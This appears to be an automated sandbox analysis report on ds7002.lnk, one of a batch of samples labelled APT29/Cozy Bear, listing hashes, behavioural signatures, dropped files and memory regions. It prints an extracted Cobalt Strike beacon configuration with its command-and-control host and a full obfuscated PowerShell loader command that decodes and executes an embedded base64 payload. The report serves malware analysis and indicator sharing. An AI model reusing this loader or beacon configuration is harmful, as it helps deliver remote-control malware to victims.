Overview
overview
10Static
static
8APT29miniduke.bin.dll
windows7_x64
1APT29miniduke.bin.dll
windows10_x64
3CozyBearIm...in.exe
windows7_x64
1CozyBearIm...in.exe
windows10_x64
1ImplantCozy.bin.exe
windows7_x64
1ImplantCozy.bin.exe
windows10_x64
1MinidukeAPT29.bin.dll
windows7_x64
1MinidukeAPT29.bin.dll
windows10_x64
3Nov2018New...es.dll
windows7_x64
10Nov2018New...es.dll
windows10_x64
10ds7002.lnk
windows7_x64
10ds7002.lnk
windows10_x64
10Nov2018New...in.lnk
windows7_x64
3Nov2018New...in.lnk
windows10_x64
3ds7002.pdf
windows7_x64
1ds7002.pdf
windows10_x64
1SeaDaddyIm...in.exe
windows7_x64
1SeaDaddyIm...in.exe
windows10_x64
1SeaDaddyIm...in.exe
windows7_x64
1SeaDaddyIm...in.exe
windows10_x64
1TrojanCozy...in.exe
windows7_x64
TrojanCozy...in.exe
windows10_x64
8atiagentCo...in.dll
windows7_x64
1atiagentCo...in.dll
windows10_x64
1Analysis
-
max time kernel
151s -
max time network
34s -
platform
windows7_x64 -
resource
win7v20201028 -
submitted
06-03-2021 19:40
Static task
static1
Behavioral task
behavioral1
Sample
APT29miniduke.bin.dll
Resource
win7v20201028
Behavioral task
behavioral2
Sample
APT29miniduke.bin.dll
Resource
win10v20201028
Behavioral task
behavioral3
Sample
CozyBearImplant.bin.exe
Resource
win7v20201028
Behavioral task
behavioral4
Sample
CozyBearImplant.bin.exe
Resource
win10v20201028
Behavioral task
behavioral5
Sample
ImplantCozy.bin.exe
Resource
win7v20201028
Behavioral task
behavioral6
Sample
ImplantCozy.bin.exe
Resource
win10v20201028
Behavioral task
behavioral7
Sample
MinidukeAPT29.bin.dll
Resource
win7v20201028
Behavioral task
behavioral8
Sample
MinidukeAPT29.bin.dll
Resource
win10v20201028
Behavioral task
behavioral9
Sample
Nov2018New!/AudioSes.dll
Resource
win7v20201028
Behavioral task
behavioral10
Sample
Nov2018New!/AudioSes.dll
Resource
win10v20201028
Behavioral task
behavioral11
Sample
ds7002.lnk
Resource
win7v20201028
Behavioral task
behavioral12
Sample
ds7002.lnk
Resource
win10v20201028
Behavioral task
behavioral13
Sample
Nov2018New!/ds7002.bin.lnk
Resource
win7v20201028
Behavioral task
behavioral14
Sample
Nov2018New!/ds7002.bin.lnk
Resource
win10v20201028
Behavioral task
behavioral15
Sample
ds7002.pdf
Resource
win7v20201028
Behavioral task
behavioral16
Sample
ds7002.pdf
Resource
win10v20201028
Behavioral task
behavioral17
Sample
SeaDaddyImplant (2).bin.exe
Resource
win7v20201028
Behavioral task
behavioral18
Sample
SeaDaddyImplant (2).bin.exe
Resource
win10v20201028
Behavioral task
behavioral19
Sample
SeaDaddyImplant.bin.exe
Resource
win7v20201028
Behavioral task
behavioral20
Sample
SeaDaddyImplant.bin.exe
Resource
win10v20201028
Behavioral task
behavioral21
Sample
TrojanCozyBear.bin.exe
Resource
win7v20201028
Behavioral task
behavioral22
Sample
TrojanCozyBear.bin.exe
Resource
win10v20201028
Behavioral task
behavioral23
Sample
atiagentCozyBear.bin.dll
Resource
win7v20201028
Behavioral task
behavioral24
Sample
atiagentCozyBear.bin.dll
Resource
win10v20201028
General
-
Target
ds7002.lnk
-
Size
392KB
-
MD5
6ed0020b0851fb71d5b0076f4ee95f3c
-
SHA1
e431261c63f94a174a1308defccc674dabbe3609
-
SHA256
2cea2a1f53dac3f4fff156eacc2ecc8e98b1a64f0f5b5ee1c42c69d9a226c55c
-
SHA512
2a0b04791ab102b6d1760c5f0940969318562f444a5864ebf270f568cc8f6283630ca76377a9fc75691b67e7c459ab10782a2deb439fa9981a2f94bb208232f3
Malware Config
Extracted
cobaltstrike
http://pandorasong.com:443/access/
-
access_type
512
-
beacon_type
2048
-
create_remote_thread
0
-
day
0
-
dns_idle
0
-
dns_sleep
0
-
host
pandorasong.com,/access/
-
http_header1
AAAACgAAAAtBY2NlcHQ6ICovKgAAAAoAAAAeR2V0Q29udGVudEZlYXR1cmVzLkRMTkEuT1JHOiAxAAAACgAAABVIb3N0OiBwYW5kb3Jhc29uZy5jb20AAAAKAAAASENvb2tpZTogIF9fdXRtYT0zMTAwNjY3MzMuMjg4NDUzNDQ0MC4xNDMzMjAxNDYyLjE0MDMyMDQzNzIuMTM4NTIwMjQ5OC43OwAAAAkAAAAJdmVyc2lvbj00AAAACQAAAA5saWQ9MTU4MjUwMjcyNAAAAAcAAAAAAAAACAAAAAUAAAAFdG9rZW4AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
http_header2
AAAACgAAAAtBY2NlcHQ6ICovKgAAAAoAAAAWQ29udGVudC1UeXBlOiB0ZXh0L3htbAAAAAoAAAAgWC1SZXF1ZXN0ZWQtV2l0aDogWE1MSHR0cFJlcXVlc3QAAAAKAAAAFUhvc3Q6IHBhbmRvcmFzb25nLmNvbQAAAAcAAAAAAAAABQAAAANyaWQAAAAJAAAADmxpZD0xNjgzNTAzNzM1AAAACQAAAB9tZXRob2Q9Z2V0U2VhcmNoUmVjb21tZW5kYXRpb25zAAAABwAAAAEAAAADAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
http_method1
GET
-
http_method2
POST
- injection_process
-
jitter
4352
-
maxdns
255
-
month
0
-
pipe_name
\\%s\pipe\msagent_%x
-
polling_time
300000
-
port_number
443
- proxy_password
- proxy_server
- proxy_username
-
sc_process32
%windir%\syswow64\rundll32.exe
-
sc_process64
%windir%\sysnative\rundll32.exe
-
state_machine
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCN7UFLcBHjvme4lLXoOKMyNrF46j4Xi87J4ilrNPDQxLOq2KHaCXP+0FsWYs7JFqLXGmqOIfALpPLIyGgnRuC60ZXaSKmCENE2O88Z0BxDkRxSaKEbgv3ETo/Ra7cF8JNr3szy0sNBVyi9dhS2WhXRIU923X2ZQxbpSyUNi5Q//wIDAQABAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
unknown1
7.382016e+08
-
unknown2
AAAABAAAAAIAAAAQAAAAAgAAABAAAAACAAAADAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA==
-
unknown3
0
-
unknown4
0
-
unknown5
2.350256387e+09
-
uri
/radio/xmlrpc/v45
-
user_agent
Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
-
year
0
Signatures
-
Cobaltstrike
Detected malicious payload which is part of Cobaltstrike.
-
Loads dropped DLL 1 IoCs
Processes:
rundll32.exepid process 1204 rundll32.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
Processes:
powershell.exepid process 1316 powershell.exe 1316 powershell.exe 1316 powershell.exe 1316 powershell.exe -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
Processes:
AcroRd32.exepid process 1088 AcroRd32.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 1316 powershell.exe -
Suspicious use of SetWindowsHookEx 4 IoCs
Processes:
AcroRd32.exepid process 1088 AcroRd32.exe 1088 AcroRd32.exe 1088 AcroRd32.exe 1088 AcroRd32.exe -
Suspicious use of WriteProcessMemory 22 IoCs
Processes:
cmd.exepowershell.execsc.execsc.exedescription pid process target process PID 1652 wrote to memory of 1316 1652 cmd.exe powershell.exe PID 1652 wrote to memory of 1316 1652 cmd.exe powershell.exe PID 1652 wrote to memory of 1316 1652 cmd.exe powershell.exe PID 1316 wrote to memory of 1016 1316 powershell.exe csc.exe PID 1316 wrote to memory of 1016 1316 powershell.exe csc.exe PID 1316 wrote to memory of 1016 1316 powershell.exe csc.exe PID 1016 wrote to memory of 968 1016 csc.exe cvtres.exe PID 1016 wrote to memory of 968 1016 csc.exe cvtres.exe PID 1016 wrote to memory of 968 1016 csc.exe cvtres.exe PID 1316 wrote to memory of 1460 1316 powershell.exe csc.exe PID 1316 wrote to memory of 1460 1316 powershell.exe csc.exe PID 1316 wrote to memory of 1460 1316 powershell.exe csc.exe PID 1460 wrote to memory of 1648 1460 csc.exe cvtres.exe PID 1460 wrote to memory of 1648 1460 csc.exe cvtres.exe PID 1460 wrote to memory of 1648 1460 csc.exe cvtres.exe PID 1316 wrote to memory of 1088 1316 powershell.exe AcroRd32.exe PID 1316 wrote to memory of 1088 1316 powershell.exe AcroRd32.exe PID 1316 wrote to memory of 1088 1316 powershell.exe AcroRd32.exe PID 1316 wrote to memory of 1088 1316 powershell.exe AcroRd32.exe PID 1316 wrote to memory of 1204 1316 powershell.exe rundll32.exe PID 1316 wrote to memory of 1204 1316 powershell.exe rundll32.exe PID 1316 wrote to memory of 1204 1316 powershell.exe rundll32.exe
Processes
-
C:\Windows\system32\cmd.execmd /c C:\Users\Admin\AppData\Local\Temp\ds7002.lnk1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noni -ep bypass $zk='JHB0Z3Q9MHgwMDA1ZTJiZTskdmNxPTB4MDAwNjIzYjY7JHRiPSJkczcwMDIubG5rIjtpZiAoLW5vdChUZXN0LVBhdGggJHRiKSl7JG9lPUdldC1DaGlsZEl0ZW0gLVBhdGggJEVudjp0ZW1wIC1GaWx0ZXIgJHRiIC1SZWN1cnNlO2lmICgtbm90ICRvZSkge2V4aXR9W0lPLkRpcmVjdG9yeV06OlNldEN1cnJlbnREaXJlY3RvcnkoJG9lLkRpcmVjdG9yeU5hbWUpO30kdnp2aT1OZXctT2JqZWN0IElPLkZpbGVTdHJlYW0gJHRiLCdPcGVuJywnUmVhZCcsJ1JlYWRXcml0ZSc7JG9lPU5ldy1PYmplY3QgYnl0ZVtdKCR2Y3EtJHB0Z3QpOyRyPSR2enZpLlNlZWsoJHB0Z3QsW0lPLlNlZWtPcmlnaW5dOjpCZWdpbik7JHI9JHZ6dmkuUmVhZCgkb2UsMCwkdmNxLSRwdGd0KTskb2U9W0NvbnZlcnRdOjpGcm9tQmFzZTY0Q2hhckFycmF5KCRvZSwwLCRvZS5MZW5ndGgpOyR6az1bVGV4dC5FbmNvZGluZ106OkFTQ0lJLkdldFN0cmluZygkb2UpO2lleCAkems7';$fz='FromBase'+0x40+'String';$rhia=[Text.Encoding]::ASCII.GetString([Convert]::$fz.Invoke($zk));iex $rhia;2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\azml0mmg\azml0mmg.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7935.tmp" "c:\Users\Admin\AppData\Local\Temp\azml0mmg\CSCF41062811AF64EB8B76355785C43DF76.TMP"4⤵
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\qnbriipl\qnbriipl.cmdline"3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES7A3E.tmp" "c:\Users\Admin\AppData\Local\Temp\qnbriipl\CSC38FD58C019844D95A74B93613CFC2C1.TMP"4⤵
-
C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe"C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AcroRd32.exe" "C:\Users\Admin\AppData\Local\Temp\ds7002.PDF"3⤵
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" C:\Users\Admin\AppData\Local\cyzfc.dat, PointFunctionCall3⤵
- Loads dropped DLL
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Temp\RES7935.tmpMD5
c50db25a7a496eaf235abb6bd2647a75
SHA1afc78d473846a3fd0a38d845a0c0b0655d6c9f8c
SHA256c86b6b71f5bc170cf33dd924331511cbafbbbcc7f366c6a06e5a1cc168e34015
SHA512fc66ecf2830995f6b4835dae786973e4217a8853fc62a8c508c8b173b32ff22f28aa62f6a06c50f9b7dc8b34986b736ff87ef0b7290faa77866643c526c63d7f
-
C:\Users\Admin\AppData\Local\Temp\RES7A3E.tmpMD5
570ae4bb3eaae2736cc22fa97655a180
SHA1d91d21d2517548175680ce3c0824ed60877f7824
SHA2569bd1b8356cfb718a4a617d0c16a6da32f16cff69d9ed29f037696c5a77880978
SHA5123b8efaa057f1bdadfd4aa7e441ec670e44cd40949309887d2332841a33d04dce4d0d46715df3fc70fe4f76d4396f2d21ec8707b2f3e803304b5077a3a09509f2
-
C:\Users\Admin\AppData\Local\Temp\azml0mmg\azml0mmg.dllMD5
81e9b50c1d1680a056d61a268e83cc33
SHA1557b6442c90a7868e5876c13890360f307257e7e
SHA2564908fd6eb24fde6ad3aa935498df13261f9d52592e6127e2924ad63a0025f827
SHA5127587cdc13ca4415a6a8e2e32eb22c06fd91283088d1492d60ff5ba227605616c5bf7ce557c27e75ce044b80a578e756a09885c7aa1e75c922954da55ab69dedb
-
C:\Users\Admin\AppData\Local\Temp\ds7002.PDFMD5
313f4808aa2a2073005d219bc68971cd
SHA1053fb60530e884851eb8b6aebbec4570ec788d4a
SHA256b1c811d3f0e930b0096a9e785f730ba4d92458bd6dcfbdff4cf7a1e247ef20d1
SHA5121d983f3c659eb3dfac3fe280e7cb3c6e25264752c11ff7d2ab232ffbf30b659a3d61bdf3773ec32caa09de716a3c439dea0d77dab5cb9e07d0e6ec43a0b1a68d
-
C:\Users\Admin\AppData\Local\Temp\qnbriipl\qnbriipl.dllMD5
90076d7f0cb65a3e35a9490bb4de5a8a
SHA1c72b79642a11f7f270103e6bb124b0885ea0486f
SHA2565d7200836431f12ae71b902c46aebbb645593862373325fb166c8d532d7dd672
SHA512ac66bd60cd9b69806faa6496d24444b54b48d882657fdd5be17deea1415064145fd8fea43383e6b4e0cf6abfc29e7d8c8ca2a4ceed1cd0835c71d0148341e3dd
-
C:\Users\Admin\AppData\Local\cyzfc.datMD5
16bbc967a8b6a365871a05c74a4f345b
SHA19858d5cb2a6614be3c48e33911bf9f7978b441bf
SHA256b77ff307ea74a3ab41c92036aea4a049b3c2e69b12a857d26910e535544dfb05
SHA51268c75c95ee27fd704088dcf381378a2cd32b396a2e405be4e4f8058cf099d88c9f22c9b9a14eaec45880a2b7ae02226f1277020470aadbc153e8dd3168711f99
-
\??\c:\Users\Admin\AppData\Local\Temp\azml0mmg\CSCF41062811AF64EB8B76355785C43DF76.TMPMD5
8189830fb4ed9efde242d87b12f19043
SHA169c614e94f2b0d2fe46f72b830f382cff60fdbba
SHA2562fd61bb673e2d36384f3fa2cfb03da55aae72338c99f35135577df1044a62c69
SHA512b8b1ea9c04aea15ce3ea677f475681939fbb2855419b94f70c3ae731f1e10b170344afffa79d067907bdd7b9fd84a61f9028d55d92f150065069229b991a5d20
-
\??\c:\Users\Admin\AppData\Local\Temp\azml0mmg\azml0mmg.0.csMD5
cdcb629e6587254315606a6ba3764745
SHA1d5b706ca48b7af8926926e80565148f725c75393
SHA2563c131fcda0193278274e4ae82bf8363e17fcc0d1110d486072061549e0b0db55
SHA51229f17e62d18c716445e09f10dfcae7e5eef72ce0a64a3a9bd8e30108beabe55029f4b70ed5f4926772c791e7fb688b7f2d0ff777641bd86c79421189b7a8cadc
-
\??\c:\Users\Admin\AppData\Local\Temp\azml0mmg\azml0mmg.cmdlineMD5
5256ad7a509e68c2155d6c261424861f
SHA1ece23d4fbb60c6cc6151810a9413b71fc7b5e703
SHA256262cc0aa5de1f301335dce47974f382b57dd68e58c6429616b263146ad8aa8db
SHA512362bf34b5a25136d7485629aa0e6d0e87b86cc2537bfee59bd813d22cdc4544c074c7167324a9939b9860f736f20dadf3269be59a657cc6c452623a923504ac8
-
\??\c:\Users\Admin\AppData\Local\Temp\qnbriipl\CSC38FD58C019844D95A74B93613CFC2C1.TMPMD5
cf77f7556f08d806e5d93d7ee5f6d2a7
SHA1081e3c401cce2c6306c880cddf906c0213f57f06
SHA2567c636eca1cc69a2a875d08a95264f4354be2ec9d0eb1b9b08c5de7c9fe4e16f7
SHA5125030634c3b38c10e6580c2ea19081e64204374095e197505f812fac2b975bee7ce3ffa6e5f084b8f95706f8c9d76107a606c271c37a25d4c9d967cab57fa4ddc
-
\??\c:\Users\Admin\AppData\Local\Temp\qnbriipl\qnbriipl.0.csMD5
171a88ab4fad87acfd2e5032eb0c6113
SHA1754de0e7656c558d335710fc41cbf196d39c1a19
SHA2565473b5550a65171ee7d5977d673c97e41e9ec16fad10ec5ab8aa3b7c798577a6
SHA51287ef6ac53a00d21f2df4d81ec5956861a4b539b10f5855345aa068c0d9d971f3329477e485471eb40b9eeea59f01fd3c42c4ab2f25e71d825cbf3586be0206b8
-
\??\c:\Users\Admin\AppData\Local\Temp\qnbriipl\qnbriipl.cmdlineMD5
0207c2684a8b1e3f48788c69acb4db21
SHA10e6b6afbf4106b67b67589f2cf0e6c45328d4c70
SHA2567ebfc5990b019d5dcecbce43c126e56956a5672f07cff2e7cc8eeaa44fd69f7e
SHA5125b6bc510a7917a566ddb134d74466cd2912758aa18a792e50049862359cb674488c234663c27555c8c182736e705515f5faa17edc66c95cadb0ee556b0a6d6c3
-
\Users\Admin\AppData\Local\cyzfc.datMD5
16bbc967a8b6a365871a05c74a4f345b
SHA19858d5cb2a6614be3c48e33911bf9f7978b441bf
SHA256b77ff307ea74a3ab41c92036aea4a049b3c2e69b12a857d26910e535544dfb05
SHA51268c75c95ee27fd704088dcf381378a2cd32b396a2e405be4e4f8058cf099d88c9f22c9b9a14eaec45880a2b7ae02226f1277020470aadbc153e8dd3168711f99
-
memory/968-17-0x0000000000000000-mapping.dmp
-
memory/1016-14-0x0000000000000000-mapping.dmp
-
memory/1088-31-0x0000000075571000-0x0000000075573000-memory.dmpFilesize
8KB
-
memory/1088-30-0x0000000000000000-mapping.dmp
-
memory/1204-38-0x0000000001E00000-0x0000000001E7E000-memory.dmpFilesize
504KB
-
memory/1204-37-0x0000000000270000-0x00000000002B0000-memory.dmpFilesize
256KB
-
memory/1204-36-0x000000006BAC0000-0x000000006BB0F000-memory.dmpFilesize
316KB
-
memory/1204-32-0x0000000000000000-mapping.dmp
-
memory/1316-7-0x000000001AC40000-0x000000001AC41000-memory.dmpFilesize
4KB
-
memory/1316-10-0x000000001ABC4000-0x000000001ABC6000-memory.dmpFilesize
8KB
-
memory/1316-9-0x000000001ABC0000-0x000000001ABC2000-memory.dmpFilesize
8KB
-
memory/1316-8-0x0000000002510000-0x0000000002511000-memory.dmpFilesize
4KB
-
memory/1316-29-0x0000000002720000-0x0000000002721000-memory.dmpFilesize
4KB
-
memory/1316-13-0x000000001AB20000-0x000000001AB21000-memory.dmpFilesize
4KB
-
memory/1316-21-0x0000000002710000-0x0000000002711000-memory.dmpFilesize
4KB
-
memory/1316-12-0x000000001C120000-0x000000001C121000-memory.dmpFilesize
4KB
-
memory/1316-11-0x0000000002540000-0x0000000002541000-memory.dmpFilesize
4KB
-
memory/1316-6-0x00000000023C0000-0x00000000023C1000-memory.dmpFilesize
4KB
-
memory/1316-5-0x000007FEF58E0000-0x000007FEF62CC000-memory.dmpFilesize
9.9MB
-
memory/1316-3-0x0000000000000000-mapping.dmp
-
memory/1460-22-0x0000000000000000-mapping.dmp
-
memory/1648-25-0x0000000000000000-mapping.dmp
-
memory/1652-2-0x000007FEFBEE1000-0x000007FEFBEE3000-memory.dmpFilesize
8KB